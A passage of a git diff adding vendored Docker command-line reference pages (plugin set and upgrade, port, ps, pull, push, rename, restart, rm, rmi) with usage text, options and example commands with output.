+```
+
+Note: since only `source` is settable in `mymount`, `docker plugin set mymount=/bar myplugin` would work too.
+
+The following example changes the path of the `mydevice` device on
+the `myplugin` plugin.
+
+```bash
+$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin
+/dev/foo
+
+$ docker plugin set myplugin mydevice.path=/dev/bar
+
+$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin
+/dev/bar
+```
+
+Note: since only `path` is settable in `mydevice`, `docker plugin set mydevice=/dev/bar myplugin` would work too.
+
+The following example changes the source of the args on the `myplugin` plugin.
+ +```bash +$ docker plugin inspect -f '{{.Settings.Args}}' myplugin +["foo", "bar"] + +$ docker plugins set myplugin args="foo bar baz" + +$ docker plugin inspect -f '{{.Settings.Args}}' myplugin +["foo", "bar", "baz"] +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md new file mode 100644 index 0000000000..20efc577aa --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md @@ -0,0 +1,84 @@ +--- +title: "plugin upgrade" +description: "the plugin upgrade command description and usage" +keywords: "plugin, upgrade" +--- + + + +# plugin upgrade + +```markdown +Usage: docker plugin upgrade [OPTIONS] PLUGIN [REMOTE] + +Upgrade a plugin + +Options: + --disable-content-trust Skip image verification (default true) + --grant-all-permissions Grant all permissions necessary to run the plugin + --help Print usage + --skip-remote-check Do not check if specified remote plugin matches existing plugin image +``` + +Upgrades an existing plugin to the specified remote plugin image. If no remote +is specified, Docker will re-pull the current image and use the updated version. +All existing references to the plugin will continue to work. +The plugin must be disabled before running the upgrade. + +The following example installs `vieus/sshfs` plugin, uses it to create and use +a volume, then upgrades the plugin. 
+ +```bash +$ docker plugin install vieux/sshfs DEBUG=1 + +Plugin "vieux/sshfs:next" is requesting the following privileges: + - network: [host] + - device: [/dev/fuse] + - capabilities: [CAP_SYS_ADMIN] +Do you grant the above permissions? [y/N] y +vieux/sshfs:next + +$ docker volume create -d vieux/sshfs:next -o sshcmd=root@1.2.3.4:/tmp/shared -o password=XXX sshvolume +sshvolume +$ docker run -it -v sshvolume:/data alpine sh -c "touch /data/hello" +$ docker plugin disable -f vieux/sshfs:next +viex/sshfs:next + +# Here docker volume ls doesn't show 'sshfsvolume', since the plugin is disabled +$ docker volume ls +DRIVER VOLUME NAME + +$ docker plugin upgrade vieux/sshfs:next vieux/sshfs:next +Plugin "vieux/sshfs:next" is requesting the following privileges: + - network: [host] + - device: [/dev/fuse] + - capabilities: [CAP_SYS_ADMIN] +Do you grant the above permissions? [y/N] y +Upgrade plugin vieux/sshfs:next to vieux/sshfs:next +$ docker plugin enable vieux/sshfs:next +viex/sshfs:next +$ docker volume ls +DRIVER VOLUME NAME +viuex/sshfs:next sshvolume +$ docker run -it -v sshvolume:/data alpine sh -c "ls /data" +hello +``` + +## Related information + +* [plugin create](plugin_create.md) +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/port.md b/vendor/github.com/docker/docker/docs/reference/commandline/port.md new file mode 100644 index 0000000000..bc90b6e786 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/port.md @@ -0,0 +1,41 @@ +--- +title: "port" +description: "The port command description and usage" +keywords: "port, mapping, container" +--- + + + +# port + +```markdown +Usage: docker port CONTAINER [PRIVATE_PORT[/PROTO]] + +List port 
mappings or a specific mapping for the container + +Options: + --help Print usage +``` + +You can find out all the ports mapped by not specifying a `PRIVATE_PORT`, or +just a specific mapping: + + $ docker ps + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + b650456536c7 busybox:latest top 54 minutes ago Up 54 minutes 0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp test + $ docker port test + 7890/tcp -> 0.0.0.0:4321 + 9876/tcp -> 0.0.0.0:1234 + $ docker port test 7890/tcp + 0.0.0.0:4321 + $ docker port test 7890/udp + 2014/06/24 11:53:36 Error: No public port '7890/udp' published for test + $ docker port test 7890 + 0.0.0.0:4321 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md new file mode 100644 index 0000000000..1d5f31da88 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md @@ -0,0 +1,384 @@ +--- +title: "ps" +description: "The ps command description and usage" +keywords: "container, running, list" +--- + + + +# ps + +```markdown +Usage: docker ps [OPTIONS] + +List containers + +Options: + -a, --all Show all containers (default shows just running) + -f, --filter value Filter output based on conditions provided (default []) + - exited= an exit code of + - label= or label== + - status=(created|restarting|removing|running|paused|exited) + - name= a container's name + - id= a container's ID + - before=(|) + - since=(|) + - ancestor=([:tag]||) + containers created from an image or a descendant. 
+ - is-task=(true|false) + - health=(starting|healthy|unhealthy|none) + --format string Pretty-print containers using a Go template + --help Print usage + -n, --last int Show n last created containers (includes all states) (default -1) + -l, --latest Show the latest created container (includes all states) + --no-trunc Don't truncate output + -q, --quiet Only display numeric IDs + -s, --size Display total file sizes +``` + +Running `docker ps --no-trunc` showing 2 linked containers. + +```bash +$ docker ps + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +4c01db0b339c ubuntu:12.04 bash 17 seconds ago Up 16 seconds 3300-3310/tcp webapp +d7886598dbe2 crosbymichael/redis:latest /redis-server --dir 33 minutes ago Up 33 minutes 6379/tcp redis,webapp/db +``` + +The `docker ps` command only shows running containers by default. To see all +containers, use the `-a` (or `--all`) flag: + +```bash +$ docker ps -a +``` + +`docker ps` groups exposed ports into a single range if possible. E.g., a +container that exposes TCP ports `100, 101, 102` displays `100-102/tcp` in +the `PORTS` column. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more +than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* id (container's id) +* label (`label=` or `label==`) +* name (container's name) +* exited (int - the code of exited containers. Only useful with `--all`) +* status (created|restarting|running|removing|paused|exited|dead) +* ancestor (`[:]`, `` or ``) - filters containers that were created from the given image or a descendant. +* before (container's id or name) - filters containers created before given id or name +* since (container's id or name) - filters containers created since given id or name +* isolation (default|process|hyperv) (Windows daemon only) +* volume (volume name or mount point) - filters containers that mount volumes. 
+* network (network id or name) - filters containers connected to the provided network +* health (starting|healthy|unhealthy|none) - filters containers based on healthcheck status + +#### Label + +The `label` filter matches containers based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches containers with the `color` label regardless of its value. + +```bash +$ docker ps --filter "label=color" + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +673394ef1d4c busybox "top" 47 seconds ago Up 45 seconds nostalgic_shockley +d85756f57265 busybox "top" 52 seconds ago Up 51 seconds high_albattani +``` + +The following filter matches containers with the `color` label with the `blue` value. + +```bash +$ docker ps --filter "label=color=blue" + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +d85756f57265 busybox "top" About a minute ago Up About a minute high_albattani +``` + +#### Name + +The `name` filter matches on all or part of a container's name. + +The following filter matches all containers with a name containing the `nostalgic_stallman` string. + +```bash +$ docker ps --filter "name=nostalgic_stallman" + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9b6247364a03 busybox "top" 2 minutes ago Up 2 minutes nostalgic_stallman +``` + +You can also filter for a substring in a name as this shows: + +```bash +$ docker ps --filter "name=nostalgic" + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +715ebfcee040 busybox "top" 3 seconds ago Up 1 second i_am_nostalgic +9b6247364a03 busybox "top" 7 minutes ago Up 7 minutes nostalgic_stallman +673394ef1d4c busybox "top" 38 minutes ago Up 38 minutes nostalgic_shockley +``` + +#### Exited + +The `exited` filter matches containers by exist status code. 
For example, to +filter for containers that have exited successfully: + +```bash +$ docker ps -a --filter 'exited=0' + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +ea09c3c82f6e registry:latest /srv/run.sh 2 weeks ago Exited (0) 2 weeks ago 127.0.0.1:5000->5000/tcp desperate_leakey +106ea823fe4e fedora:latest /bin/sh -c 'bash -l' 2 weeks ago Exited (0) 2 weeks ago determined_albattani +48ee228c9464 fedora:20 bash 2 weeks ago Exited (0) 2 weeks ago tender_torvalds +``` + +#### Killed containers + +You can use a filter to locate containers that exited with status of `137` +meaning a `SIGKILL(9)` killed them. + +```bash +$ docker ps -a --filter 'exited=137' +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +b3e1c0ed5bfe ubuntu:latest "sleep 1000" 12 seconds ago Exited (137) 5 seconds ago grave_kowalevski +a2eb5558d669 redis:latest "/entrypoint.sh redi 2 hours ago Exited (137) 2 hours ago sharp_lalande +``` + +Any of these events result in a `137` status: + +* the `init` process of the container is killed manually +* `docker kill` kills the container +* Docker daemon restarts which kills all running containers + +#### Status + +The `status` filter matches containers by status. You can filter using +`created`, `restarting`, `running`, `removing`, `paused`, `exited` and `dead`. 
For example, +to filter for `running` containers: + +```bash +$ docker ps --filter status=running + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +715ebfcee040 busybox "top" 16 minutes ago Up 16 minutes i_am_nostalgic +d5c976d3c462 busybox "top" 23 minutes ago Up 23 minutes top +9b6247364a03 busybox "top" 24 minutes ago Up 24 minutes nostalgic_stallman +``` + +To filter for `paused` containers: + +```bash +$ docker ps --filter status=paused + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +673394ef1d4c busybox "top" About an hour ago Up About an hour (Paused) nostalgic_shockley +``` + +#### Ancestor + +The `ancestor` filter matches containers based on its image or a descendant of +it. The filter supports the following image representation: + +- image +- image:tag +- image:tag@digest +- short-id +- full-id + +If you don't specify a `tag`, the `latest` tag is used. For example, to filter +for containers that use the latest `ubuntu` image: + +```bash +$ docker ps --filter ancestor=ubuntu + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +919e1179bdb8 ubuntu-c1 "top" About a minute ago Up About a minute admiring_lovelace +5d1e4a540723 ubuntu-c2 "top" About a minute ago Up About a minute admiring_sammet +82a598284012 ubuntu "top" 3 minutes ago Up 3 minutes sleepy_bose +bab2a34ba363 ubuntu "top" 3 minutes ago Up 3 minutes focused_yonath +``` + +Match containers based on the `ubuntu-c1` image which, in this case, is a child +of `ubuntu`: + +```bash +$ docker ps --filter ancestor=ubuntu-c1 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +919e1179bdb8 ubuntu-c1 "top" About a minute ago Up About a minute admiring_lovelace +``` + +Match containers based on the `ubuntu` version `12.04.5` image: + +```bash +$ docker ps --filter ancestor=ubuntu:12.04.5 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +82a598284012 ubuntu:12.04.5 "top" 3 minutes ago Up 3 minutes sleepy_bose +``` + +The following matches containers based on the layer 
`d0e008c6cf02` or an image +that have this layer in its layer stack. + +```bash +$ docker ps --filter ancestor=d0e008c6cf02 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +82a598284012 ubuntu:12.04.5 "top" 3 minutes ago Up 3 minutes sleepy_bose +``` + +#### Before + +The `before` filter shows only containers created before the container with +given id or name. For example, having these containers created: + +```bash +$ docker ps + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9c3527ed70ce busybox "top" 14 seconds ago Up 15 seconds desperate_dubinsky +4aace5031105 busybox "top" 48 seconds ago Up 49 seconds focused_hamilton +6e63f6ff38b0 busybox "top" About a minute ago Up About a minute distracted_fermat +``` + +Filtering with `before` would give: + +```bash +$ docker ps -f before=9c3527ed70ce + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +4aace5031105 busybox "top" About a minute ago Up About a minute focused_hamilton +6e63f6ff38b0 busybox "top" About a minute ago Up About a minute distracted_fermat +``` + +#### Since + +The `since` filter shows only containers created since the container with given +id or name. 
For example, with the same containers as in `before` filter: + +```bash +$ docker ps -f since=6e63f6ff38b0 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9c3527ed70ce busybox "top" 10 minutes ago Up 10 minutes desperate_dubinsky +4aace5031105 busybox "top" 10 minutes ago Up 10 minutes focused_hamilton +``` + +#### Volume + +The `volume` filter shows only containers that mount a specific volume or have +a volume mounted in a specific path: + +```bash{% raw %} +$ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}" +CONTAINER ID MOUNTS +9c3527ed70ce remote-volume + +$ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}" +CONTAINER ID MOUNTS +9c3527ed70ce remote-volume +{% endraw %}``` + +#### Network + +The `network` filter shows only containers that are connected to a network with +a given name or id. + +The following filter matches all containers that are connected to a network +with a name containing `net1`. + +```bash +$ docker run -d --net=net1 --name=test1 ubuntu top +$ docker run -d --net=net2 --name=test2 ubuntu top + +$ docker ps --filter network=net1 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9d4893ed80fe ubuntu "top" 10 minutes ago Up 10 minutes test1 +``` + +The network filter matches on both the network's name and id. The following +example shows all containers that are attached to the `net1` network, using +the network id as a filter; + +```bash +{% raw %} +$ docker network inspect --format "{{.ID}}" net1 +{% endraw %} + +8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5 + +$ docker ps --filter network=8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5 + +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +9d4893ed80fe ubuntu "top" 10 minutes ago Up 10 minutes test1 +``` + +## Formatting + +The formatting option (`--format`) pretty-prints container output using a Go +template. 
+ +Valid placeholders for the Go template are listed below: + +Placeholder | Description +--------------|---------------------------------------------------------------------------------------------------- +`.ID` | Container ID +`.Image` | Image ID +`.Command` | Quoted command +`.CreatedAt` | Time when the container was created. +`.RunningFor` | Elapsed time since the container was started. +`.Ports` | Exposed ports. +`.Status` | Container status. +`.Size` | Container disk size. +`.Names` | Container names. +`.Labels` | All labels assigned to the container. +`.Label` | Value of a specific label for this container. For example `'{% raw %}{{.Label "com.docker.swarm.cpu"}}{% endraw %}'` +`.Mounts` | Names of the volumes mounted in this container. +`.Networks` | Names of the networks attached to this container. + +When using the `--format` option, the `ps` command will either output the data +exactly as the template declares or, when using the `table` directive, includes +column headers as well. 
+ +The following example uses a template without headers and outputs the `ID` and +`Command` entries separated by a colon for all running containers: + +```bash +{% raw %} +$ docker ps --format "{{.ID}}: {{.Command}}" +{% endraw %} + +a87ecb4f327c: /bin/sh -c #(nop) MA +01946d9d34d8: /bin/sh -c #(nop) MA +c1d3b0166030: /bin/sh -c yum -y up +41d50ecd2f57: /bin/sh -c #(nop) MA +``` + +To list all running containers with their labels in a table format you can use: + +```bash +{% raw %} +$ docker ps --format "table {{.ID}}\t{{.Labels}}" +{% endraw %} + +CONTAINER ID LABELS +a87ecb4f327c com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd +01946d9d34d8 +c1d3b0166030 com.docker.swarm.node=debian,com.docker.swarm.cpu=6 +41d50ecd2f57 com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md new file mode 100644 index 0000000000..0c960b404a --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md @@ -0,0 +1,252 @@ +--- +title: "pull" +description: "The pull command description and usage" +keywords: "pull, image, hub, docker" +--- + + + +# pull + +```markdown +Usage: docker pull [OPTIONS] NAME[:TAG|@DIGEST] + +Pull an image or a repository from a registry + +Options: + -a, --all-tags Download all tagged images in the repository + --disable-content-trust Skip image verification (default true) + --help Print usage +``` + +Most of your images will be created on top of a base image from the +[Docker Hub](https://hub.docker.com) registry. + +[Docker Hub](https://hub.docker.com) contains many pre-built images that you +can `pull` and try without needing to define and configure your own. + +To download a particular image, or set of images (i.e., a repository), +use `docker pull`. 
+
+## Proxy configuration
+
+If you are behind an HTTP proxy server, for example in corporate settings,
+before opening a connection to the registry, you may need to configure the Docker
+daemon's proxy settings, using the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`
+environment variables. To set these environment variables on a host using
+`systemd`, refer to the [control and configure Docker with systemd](https://docs.docker.com/engine/admin/systemd/#http-proxy)
+for variables configuration.
+
+## Concurrent downloads
+
+By default the Docker daemon will pull three layers of an image at a time.
+If you are on a low bandwidth connection this may cause timeout issues and you may want to lower
+this via the `--max-concurrent-downloads` daemon option. See the
+[daemon documentation](dockerd.md) for more details.
+
+## Examples
+
+### Pull an image from Docker Hub
+
+To download a particular image, or set of images (i.e., a repository), use
+`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a
+default. This command pulls the `debian:latest` image:
+
+```bash
+$ docker pull debian
+
+Using default tag: latest
+latest: Pulling from library/debian
+fdd5d7827f33: Pull complete
+a3ed95caeb02: Pull complete
+Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa
+Status: Downloaded newer image for debian:latest
+```
+
+Docker images can consist of multiple layers. In the example above, the image
+consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`.
+
+Layers can be reused by images. For example, the `debian:jessie` image shares
+both layers with `debian:latest`.
Pulling the `debian:jessie` image therefore +only pulls its metadata, but not its layers, because all layers are already +present locally: + +```bash +$ docker pull debian:jessie + +jessie: Pulling from library/debian +fdd5d7827f33: Already exists +a3ed95caeb02: Already exists +Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e +Status: Downloaded newer image for debian:jessie +``` + +To see which images are present locally, use the [`docker images`](images.md) +command: + +```bash +$ docker images + +REPOSITORY TAG IMAGE ID CREATED SIZE +debian jessie f50f9524513f 5 days ago 125.1 MB +debian latest f50f9524513f 5 days ago 125.1 MB +``` + +Docker uses a content-addressable image store, and the image ID is a SHA256 +digest covering the image's configuration and layers. In the example above, +`debian:jessie` and `debian:latest` have the same image ID because they are +actually the *same* image tagged with different names. Because they are the +same image, their layers are stored only once and do not consume extra disk +space. + +For more information about images, layers, and the content-addressable store, +refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/). + + +## Pull an image by digest (immutable identifier) + +So far, you've pulled images by their name (and "tag"). Using names and tags is +a convenient way to work with images. When using tags, you can `docker pull` an +image again to make sure you have the most up-to-date version of that image. +For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu +14.04 image. + +In some cases you don't want images to be updated to newer versions, but prefer +to use a fixed version of an image. Docker enables you to pull an image by its +*digest*. When pulling an image by digest, you specify *exactly* which version +of an image to pull. 
Doing so, allows you to "pin" an image to that version, +and guarantee that the image you're using is always the same. + +To know the digest of an image, pull the image first. Let's pull the latest +`ubuntu:14.04` image from Docker Hub: + +```bash +$ docker pull ubuntu:14.04 + +14.04: Pulling from library/ubuntu +5a132a7e7af1: Pull complete +fd2731e4c50c: Pull complete +28a2f68d1120: Pull complete +a3ed95caeb02: Pull complete +Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +Status: Downloaded newer image for ubuntu:14.04 +``` + +Docker prints the digest of the image after the pull has finished. In the example +above, the digest of the image is: + + sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + +Docker also prints the digest of an image when *pushing* to a registry. This +may be useful if you want to pin to a version of the image you just pushed. + +A digest takes the place of the tag when pulling an image, for example, to +pull the above image by digest, run the following command: + +```bash +$ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + +sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu +5a132a7e7af1: Already exists +fd2731e4c50c: Already exists +28a2f68d1120: Already exists +a3ed95caeb02: Already exists +Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +``` + +Digest can also be used in the `FROM` of a Dockerfile, for example: + +```Dockerfile +FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +MAINTAINER some maintainer +``` + +> **Note**: Using this feature "pins" an image to a specific version in time. +> Docker will therefore not pull updated versions of an image, which may include +> security updates. 
If you want to pull an updated image, you need to change the +> digest accordingly. + + +## Pulling from a different registry + +By default, `docker pull` pulls images from [Docker Hub](https://hub.docker.com). It is also possible to +manually specify the path of a registry to pull from. For example, if you have +set up a local registry, you can specify its path to pull from it. A registry +path is similar to a URL, but does not contain a protocol specifier (`https://`). + +The following command pulls the `testing/test-image` image from a local registry +listening on port 5000 (`myregistry.local:5000`): + +```bash +$ docker pull myregistry.local:5000/testing/test-image +``` + +Registry credentials are managed by [docker login](login.md). + +Docker uses the `https://` protocol to communicate with a registry, unless the +registry is allowed to be accessed over an insecure connection. Refer to the +[insecure registries](dockerd.md#insecure-registries) section for more information. + + +## Pull a repository with multiple images + +By default, `docker pull` pulls a *single* image from the registry. A repository +can contain multiple images. To pull all images from a repository, provide the +`-a` (or `--all-tags`) option when using `docker pull`. + +This command pulls all images from the `fedora` repository: + +```bash +$ docker pull --all-tags fedora + +Pulling repository fedora +ad57ef8d78d7: Download complete +105182bb5e8b: Download complete +511136ea3c5a: Download complete +73bd853d2ea5: Download complete +.... + +Status: Downloaded newer image for fedora +``` + +After the pull has completed use the `docker images` command to see the +images that were pulled. 
The example below shows all the `fedora` images +that are present locally: + +```bash +$ docker images fedora + +REPOSITORY TAG IMAGE ID CREATED SIZE +fedora rawhide ad57ef8d78d7 5 days ago 359.3 MB +fedora 20 105182bb5e8b 5 days ago 372.7 MB +fedora heisenbug 105182bb5e8b 5 days ago 372.7 MB +fedora latest 105182bb5e8b 5 days ago 372.7 MB +``` + +## Canceling a pull + +Killing the `docker pull` process, for example by pressing `CTRL-c` while it is +running in a terminal, will terminate the pull operation. + +```bash +$ docker pull fedora + +Using default tag: latest +latest: Pulling from library/fedora +a3ed95caeb02: Pulling fs layer +236608c7b546: Pulling fs layer +^C +``` + +> **Note**: Technically, the Engine terminates a pull operation when the +> connection between the Docker Engine daemon and the Docker Engine client +> initiating the pull is lost. If the connection with the Engine daemon is +> lost for other reasons than a manual interaction, the pull is also aborted. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/push.md b/vendor/github.com/docker/docker/docs/reference/commandline/push.md new file mode 100644 index 0000000000..e36fd026d1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/push.md @@ -0,0 +1,75 @@ +--- +title: "push" +description: "The push command description and usage" +keywords: "share, push, image" +--- + + + +# push + +```markdown +Usage: docker push [OPTIONS] NAME[:TAG] + +Push an image or a repository to a registry + +Options: + --disable-content-trust Skip image verification (default true) + --help Print usage +``` + +Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com) +registry or to a self-hosted one. + +Refer to the [`docker tag`](tag.md) reference for more information about valid +image and tag names. + +Killing the `docker push` process, for example by pressing `CTRL-c` while it is +running in a terminal, terminates the push operation. 
+ +Registry credentials are managed by [docker login](login.md). + +## Concurrent uploads + +By default the Docker daemon will push five layers of an image at a time. +If you are on a low bandwidth connection this may cause timeout issues and you may want to lower +this via the `--max-concurrent-uploads` daemon option. See the +[daemon documentation](dockerd.md) for more details. + +## Examples + +### Pushing a new image to a registry + +First save the new image by finding the container ID (using [`docker ps`](ps.md)) +and then committing it to a new image name. Note that only `a-z0-9-_.` are +allowed when naming images: + +```bash +$ docker commit c16378f943fe rhel-httpd +``` + +Now, push the image to the registry using the image ID. In this example the +registry is on host named `registry-host` and listening on port `5000`. To do +this, tag the image with the host name or IP address, and the port of the +registry: + +```bash +$ docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd +$ docker push registry-host:5000/myadmin/rhel-httpd +``` + +Check that this worked by running: + +```bash +$ docker images +``` + +You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd` +listed. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md new file mode 100644 index 0000000000..be035f1ce4 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md @@ -0,0 +1,27 @@ +--- +title: "rename" +description: "The rename command description and usage" +keywords: "rename, docker, container" +--- + + + +# rename + +```markdown +Usage: docker rename CONTAINER NEW_NAME + +Rename a container + +Options: + --help Print usage +``` + +The `docker rename` command allows the container to be renamed to a different name. 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md new file mode 100644 index 0000000000..9f7ed00553 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md @@ -0,0 +1,26 @@ +--- +title: "restart" +description: "The restart command description and usage" +keywords: "restart, container, Docker" +--- + + + +# restart + +```markdown +Usage: docker restart [OPTIONS] CONTAINER [CONTAINER...] + +Restart one or more containers + +Options: + --help Print usage + -t, --time int Seconds to wait for stop before killing the container (default 10) +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md new file mode 100644 index 0000000000..1c3e795933 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md @@ -0,0 +1,69 @@ +--- +title: "rm" +description: "The rm command description and usage" +keywords: "remove, Docker, container" +--- + + + +# rm + +```markdown +Usage: docker rm [OPTIONS] CONTAINER [CONTAINER...] + +Remove one or more containers + +Options: + -f, --force Force the removal of a running container (uses SIGKILL) + --help Print usage + -l, --link Remove the specified link + -v, --volumes Remove the volumes associated with the container +``` + +## Examples + + $ docker rm /redis + /redis + +This will remove the container referenced under the link +`/redis`. + + $ docker rm --link /webapp/redis + /webapp/redis + +This will remove the underlying link between `/webapp` and the `/redis` +containers removing all network communication. + + $ docker rm --force redis + redis + +The main process inside the container referenced under the link `/redis` will receive +`SIGKILL`, then the container will be removed. + + $ docker rm $(docker ps -a -q) + +This command will delete all stopped containers. 
The command +`docker ps -a -q` will return all existing container IDs and pass them to +the `rm` command which will delete them. Any running containers will not be +deleted. + + $ docker rm -v redis + redis + +This command will remove the container and any volumes associated with it. +Note that if a volume was specified with a name, it will not be removed. + + $ docker create -v awesome:/foo -v /bar --name hello redis + hello + $ docker rm -v hello + +In this example, the volume for `/foo` will remain intact, but the volume for +`/bar` will be removed. The same behavior holds for volumes inherited with +`--volumes-from`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md new file mode 100644 index 0000000000..149b7635b6 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md @@ -0,0 +1,83 @@ +--- +title: "rmi" +description: "The rmi command description and usage" +keywords: "remove, image, Docker" +--- + + + +# rmi + +```markdown +Usage: docker rmi [OPTIONS] IMAGE [IMAGE...] + +Remove one or more images + +Options: + -f, --force Force removal of the image + --help Print usage + --no-prune Do not delete untagged parents +``` + +You can remove an image using its short or long ID, its tag, or its digest. If +an image has one or more tag referencing it, you must remove all of them before +the image is removed. Digest references are removed automatically when an image +is removed by tag. 
+ + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + test1 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + test2 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + + $ docker rmi fd484f19954f + Error: Conflict, cannot delete image fd484f19954f because it is tagged in multiple repositories, use -f to force + 2013/12/11 05:47:16 Error: failed to remove one or more images + + $ docker rmi test1 + Untagged: test1:latest + $ docker rmi test2 + Untagged: test2:latest + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + $ docker rmi test + Untagged: test:latest + Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8 + +If you use the `-f` flag and specify the image's short or long ID, then this +command untags and removes all images that match the specified ID. + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + test1 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + test2 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + + $ docker rmi -f fd484f19954f + Untagged: test1:latest + Untagged: test:latest + Untagged: test2:latest + Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8 + +An image pulled by digest has no tag associated with it: + + $ docker images --digests + REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE + localhost:5000/test/busybox sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf 